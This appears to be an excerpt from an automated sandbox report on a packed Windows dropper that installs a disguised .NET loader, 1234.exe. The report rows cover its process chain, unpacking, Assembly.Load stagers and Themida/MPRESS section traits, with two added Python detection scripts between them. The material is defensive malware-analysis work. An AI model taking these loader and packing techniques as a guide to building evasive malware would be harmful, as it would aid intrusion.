Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
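The process chain above is the whole story of the sample in five rows: the dropper on the Desktop writes 1234.exe to AppData\Roaming, 1234.exe launches two copies of itself with the literal command line {path}, and one of them drops and starts srvs.exe from Temp. As an added example (not code from the report or from Joe Sandbox), the Python below encodes those observables as lineage rules over process-creation events. The report gives neither PIDs nor parent links, so the event list is constructed with invented PIDs and an assumed parent for each row (srvs.exe is attached to the second 1234.exe child, reading the report's srvs.exe.15.dr name as "dropped by process 15"); the notepad.exe row is a benign control that must not fire.

```python
"""Lineage checks over process-creation events shaped like the 'Process created'
rows above (constructed example, not code from the report). The report has no
PIDs or parent links, so the sample events use made-up PIDs and assumed parents."""
import re

# Directories a standard user can write to. The Desktop is left out on purpose:
# a sample sitting on the sandbox Desktop is an artefact of the analysis, not a signal.
USER_WRITABLE = ("\\AppData\\Roaming\\", "\\AppData\\Local\\Temp\\",
                 "\\Users\\Public\\", "\\Downloads\\")
# A command line consisting of nothing but a literal token such as {path}.
PLACEHOLDER = re.compile(r"\{[A-Za-z_]+\}")

# Constructed sample events: (pid, ppid, image path, command line). PIDs are invented.
EVENTS = [
    (1000, 900, r"C:\Users\user\Desktop\Nb2HQZZDIf.exe", r"'C:\Users\user\Desktop\Nb2HQZZDIf.exe'"),
    (1002, 1000, r"C:\Users\user\AppData\Roaming\1234.exe", r"C:\Users\user\AppData\Roaming\1234.exe 1234"),
    (1014, 1002, r"C:\Users\user\AppData\Roaming\1234.exe", "{path}"),
    (1015, 1002, r"C:\Users\user\AppData\Roaming\1234.exe", "{path}"),
    (1021, 1015, r"C:\Users\user\AppData\Local\Temp\srvs.exe", r"'C:\Users\user\AppData\Local\Temp\srvs.exe'"),
    (1030, 900, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]

def in_user_writable(image):
    """True when the image path contains one of the user-writable directory markers."""
    return any(marker.lower() in image.lower() for marker in USER_WRITABLE)

def ancestry(events, pid):
    """Image file names from the oldest known ancestor down to pid."""
    by_pid = {e[0]: e for e in events}
    chain = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        chain.append(image.rsplit("\\", 1)[-1])
        pid = ppid
    return chain[::-1]

def assess(event, events):
    """Reasons this creation event is suspicious; an empty list means no rule fired."""
    pid, ppid, image, cmdline = event
    parent = {e[0]: e for e in events}.get(ppid)
    reasons = []
    if in_user_writable(image):
        reasons.append("image runs from a user-writable directory")
    if parent and parent[2].lower() == image.lower():
        reasons.append("parent re-launched its own image")
    if PLACEHOLDER.fullmatch(cmdline.strip()):
        reasons.append("command line is a bare placeholder token")
    # Only escalate on the parent's location when something else already fired.
    if reasons and parent and in_user_writable(parent[2]):
        reasons.append("parent also runs from a user-writable directory")
    return reasons

def findings(events):
    """pid -> reasons, restricted to events that triggered at least one rule."""
    return {e[0]: assess(e, events) for e in events if assess(e, events)}

if __name__ == "__main__":
    for pid, reasons in findings(EVENTS).items():
        print(pid, " > ".join(ancestry(EVENTS, pid)))
        for reason in reasons:
            print("   -", reason)
```

The self-relaunch rule targets the shape that the "Injects a PE file into a foreign processes" signature in the overview usually takes for .NET loaders: start a copy of your own image and replace its contents before it runs. On a real endpoint feed (Sysmon event 1, EDR process telemetry) the same four rules need only the image, parent image and command line fields, and the ancestry() string is what belongs in the alert.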
Source: C:\Users\user\AppData\Roaming\1234.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\1234.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Nb2HQZZDIf.exe | Static PE information: Image base 0x140000000 > 0x60000000
                      Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: srvs.exe, 00000015.00000002.480413638.0000000001182000.00000040.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Unpacked PE file: 0.2.Nb2HQZZDIf.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Unpacked PE file: 21.2.srvs.exe.df0000.0.unpack :ER; :R; :R;.vm_sec:W;.idata:W;.vimp0:ER;.themida:EW;.boot:ER;.vimp0:ER;.rsrc:R; vs :ER; :R; :R;
.NET source code contains potential unpacker
Source: 1234.exe.0.dr, uNotepad/Form1.cs | .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs | .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs | .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs | .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs | .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: srvs.exe.15.dr | Static PE information: 0xE3EEDDA9 [Wed Mar 7 05:05:45 2091 UTC]
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,
Source: initial sample | Static PE information: section where entry point is pointing to: .MPRESS2
Source: 1234.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0xf8b72
Source: Nb2HQZZDIf.exe | Static PE information: real checksum: 0x99744 should be: 0xa8478
Source: Nb2HQZZDIf.exe | Static PE information: section name: .MPRESS1
Source: Nb2HQZZDIf.exe | Static PE information: section name: .MPRESS2
Source: srvs.exe.15.dr | Static PE information: section name:
Source: srvs.exe.15.dr | Static PE information: section name:
Source: srvs.exe.15.dr | Static PE information: section name:
Source: srvs.exe.15.dr | Static PE information: section name: .vm_sec
Source: srvs.exe.15.dr | Static PE information: section name: .vimp0
Source: srvs.exe.15.dr | Static PE information: section name: .themida
Source: srvs.exe.15.dr | Static PE information: section name: .boot
Source: srvs.exe.15.dr | Static PE information: section name: .vimp0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_00931234 push ss; ret
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009B669E pushad ; retf
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009B5593 pushfd ; ret
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009B09D4 pushfd ; ret
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009AEE08 push esi; retn 0000h
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009B9770 pushfd ; ret
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2620 push rax; retf
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2630 push rax; retf
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0160F960 push esp; iretd
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_017E112D push FFFFFF8Bh; iretd
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079047E9 push 1441A4BAh; iretd
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_0297EEC0 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_0297F100 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D4215 push FFFFFF8Bh; iretd
Source: initial sample | Static PE information: section name: .MPRESS1 entropy: 7.9995184158
Source: initial sample | Static PE information: section name: .text entropy: 7.5685116349
Source: initial sample | Static PE information: section name: entropy: 7.98684257143
Source: initial sample | Static PE information: section name: .vimp0 entropy: 7.99703516028
Source: initial sample | Static PE information: section name: .vimp0 entropy: 7.29946899453
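The static signatures above (section rights that differ between the on-disk file and the memory dump, a TimeDateStamp in 2091, packer section names including blank ones, per-section entropy close to 8.0) are cheap to reproduce on any sample before it goes anywhere near a sandbox. The following is an added example, not code from the report or from Joe Sandbox: a dependency-free Python PE section parser with exactly those checks. The images it runs on are constructed inside the block (a three-section layout modelled on the .MPRESS1/.MPRESS2/.rsrc file above, stamped with the 0xE3EEDDA9 timestamp reported for srvs.exe); the E/R/W rendering, the 7.0 entropy threshold, the 1990 lower bound on timestamps and the analysis date are assumptions.

```python
"""PE section triage in pure Python (constructed example, not code from the report
or from Joe Sandbox): parse the section table, render rights as E/R/W, compute
per-section entropy, sanity-check the COFF timestamp, and diff section rights
between an on-disk image and a memory dump of the same module."""
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a stock linker emits; packer sections (.MPRESS1, .themida, .vimp0, blank) are not here.
COMMON_NAMES = {".text", ".data", ".rdata", ".rsrc", ".reloc", ".idata", ".edata",
                ".pdata", ".bss", ".tls", ".CRT", ".debug"}
EPOCH_1990 = 631152000  # assumed lower bound: earlier timestamps are as suspect as future ones

def shannon_entropy(buf):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(data):
    """Return (TimeDateStamp, [{name, flags, entropy}, ...]) from a PE image in memory."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size  # section headers follow signature, COFF and optional header
    sections = []
    for i in range(nsections):
        name, _, _, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "flags": flags, "entropy": shannon_entropy(raw)})
    return timestamp, sections

def rights(flags):
    """E/R/W string for a section's characteristics, in the spirit of the report's .MPRESS1:EW."""
    letters = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, bit in letters if flags & bit)

def triage(data, analysis_time, entropy_threshold=7.0):
    """List of (section, reason) findings for one image."""
    timestamp, sections = parse_sections(data)
    findings = []
    if timestamp > analysis_time or timestamp < EPOCH_1990:
        findings.append(("<header>", "suspicious TimeDateStamp 0x%08X" % timestamp))
    for s in sections:
        label = s["name"] or "<blank>"
        r = rights(s["flags"])
        if "W" in r and "E" in r:
            findings.append((label, "writable and executable (%s)" % r))
        if s["entropy"] > entropy_threshold:
            findings.append((label, "entropy %.3f" % s["entropy"]))
        if s["name"] not in COMMON_NAMES:
            findings.append((label, "non-standard section name"))
    return findings

def changed_rights(disk_image, dump_image):
    """(name, disk rights, dump rights) for sections whose rights differ, the static
    half of the 'Unpacked PE file ... vs ...' signature above."""
    _, disk = parse_sections(disk_image)
    _, dump = parse_sections(dump_image)
    return [(d["name"], rights(d["flags"]), rights(m["flags"]))
            for d, m in zip(disk, dump) if rights(d["flags"]) != rights(m["flags"])]

def build_pe(timestamp, sections):
    """Construct a minimal PE image (test data, only as complete as the parser needs).
    sections: [(name, characteristics, raw bytes)]."""
    opt_size = 0xF0
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)  # PE32+ magic, rest zeroed
    raw_ptr = 0x40 + 24 + opt_size + 40 * len(sections)
    table, body = b"", b""
    for name, flags, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), 0x1000, len(raw),
                             raw_ptr, 0, 0, 0, 0, flags)
        body += raw
        raw_ptr += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + opt + table + body

UNIFORM = bytes(range(256)) * 16  # every byte value equally often: entropy exactly 8.0
ZEROS = b"\0" * 4096              # entropy 0.0
ANALYSIS_TIME = 1622505600        # assumed analysis date, 2021-06-01 00:00:00 UTC
EXEC_READ = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ

# Constructed on-disk image modelled on the report: MPRESS sections, ER rights, future timestamp.
ON_DISK = build_pe(0xE3EEDDA9, [(".MPRESS1", EXEC_READ, UNIFORM),
                                (".MPRESS2", EXEC_READ, ZEROS),
                                (".rsrc", IMAGE_SCN_MEM_READ, ZEROS)])
# The same module as dumped after the stub ran and made its sections writable to unpack in place.
IN_MEMORY = build_pe(0xE3EEDDA9, [(".MPRESS1", EXEC_READ | IMAGE_SCN_MEM_WRITE, ZEROS),
                                  (".MPRESS2", EXEC_READ | IMAGE_SCN_MEM_WRITE, ZEROS),
                                  (".rsrc", IMAGE_SCN_MEM_READ, ZEROS)])

if __name__ == "__main__":
    for section, reason in triage(ON_DISK, ANALYSIS_TIME):
        print("%-10s %s" % (section, reason))
    print("rights changed:", changed_rights(ON_DISK, IN_MEMORY))
```

A section that is ER on disk and ERW in the dump has been re-protected by the stub, which is what the "Detected unpacking" signature records. Entropy near 8.0 in a section with a non-standard name at the entry point is the MPRESS/Themida profile seen here, and the same 7.0 threshold also flags the 7.57 entropy reported for the .text section of 1234.exe, consistent with the Assembly.Load(System.Byte[]) stager that the ".NET source code contains potential unpacker" signature points at.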
Source: 1234.exe.0.dr, uNotepad/Form_Main.cs | High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 1234.exe.0.dr, uNotepad/MDSDDD.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 1234.exe.0.dr, uNotepad/Form1.cs | High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 1234.exe.0.dr, uNotepad/MainWindow.cs | High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 1234.exe.0.dr, uNotepad/CollectionToSort.cs | High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 1234.exe.0.dr, uNotepad/AramaFormu.cs | High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 1234.exe.0.dr, uNotepad/About.cs | High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 1234.exe.0.dr, uNotepad/CollectionOfElements.cs | High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 1234.exe.0.dr, uNotepad/TextUtility.cs | High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 1234.exe.0.dr, uNotepad/uNote.cs | High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/MDSDDD.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs | High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.cs | High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/uNote.cs | High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/About.cs | High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/AramaFormu.cs | High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionOfElements.cs | High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/TextUtility.cs | High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/Form_Main.cs | High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/MainWindow.cs | High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form_Main.cs | High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/MDSDDD.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/MainWindow.cs | High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/Form1.cs | High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.cs | High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/uNote.cs | High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/About.cs | High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/AramaFormu.cs | High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionOfElements.cs | High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/TextUtility.cs | High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/MDSDDD.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs | High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.cs | High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/uNote.cs | High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/About.cs | High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/AramaFormu.cs | High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionOfElements.cs | High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/TextUtility.cs | High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/Form_Main.cs | High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/MainWindow.cs | High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/MDSDDD.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/Form1.cs | High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
